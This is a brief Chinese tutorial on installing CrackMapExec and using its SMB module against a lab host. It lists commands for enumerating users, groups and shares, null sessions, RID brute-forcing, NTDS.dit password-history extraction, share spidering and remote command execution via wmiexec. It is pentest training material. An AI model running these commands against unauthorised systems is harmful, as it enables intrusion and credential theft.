工具鏈接:https://github.com/byt3bl33d3r/CrackMapExec
Kali下安裝
apt-get install crackmapexec
apt-get install -y libssl-dev libffi-dev python-dev build-essential
pip install --user pipenv
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec && pipenv install
pipenv shell
python setup.py install
使用
進入CrackMapExec目錄,執(zhí)行pipenv shell
![]()
2019-08-18_143135.png
2019-08-18_143135.png
官方范例
https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference
測試
#### 列出共享
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --shares
#### 列出會話
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --sessions
#### 列出磁盤信息
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --disks
#### 列出登錄的用戶
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --loggedon-users
#### 列出域用戶
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --users
#### 根據(jù)唯一的RID列出所有的用戶
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --rid-brute
#### 列出域組
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --groups
#### 列出本地組
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --local-groups
#### 列出域密碼策略
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --pass-pol
#### 嘗試空會話
cme smb 192.168.127.235 -u '' -p ''
#### 列出指定域信息
cme smb 192.168.127.235 -u admin -p 'xxxeeee' -d LABNET
#### 列出ntds.dit的歷史信息
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --ntds-history
#### 爬行C盤目錄信息
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --spider C\$ --pattern txt
cme smb 192.168.127.235 -u admin -p 'xxxeeee' --spider C\$
#### 遠程執(zhí)行命令
cme smb 192.168.127.235 -u admin -p 'xxxeeee' -X '$PSVersionTable' --exec-method wmiexec
cme smb 192.168.127.235 -u admin -p 'xxxeeee' -X '$set' --exec-method wmiexec
cme smb 192.168.127.235 -u admin -p 'xxxeeee' -X '$whoami' --exec-method wmiexec
cme smb 192.168.127.235 -u admin -p 'xxxeeee' -X 'whoami' --exec-method wmiexec
cme smb 192.168.127.235 -u admin -p 'xxxeeee' -X 'ipconfig /all' --exec-method wmiexec
cme smb 192.168.127.235 -u admin -p 'xxxeeee' -X 'tasklist /svc' --exec-method wmiexec
cme smb 192.168.127.235 -u admin -p 'xxxeeee' -x ipconfig
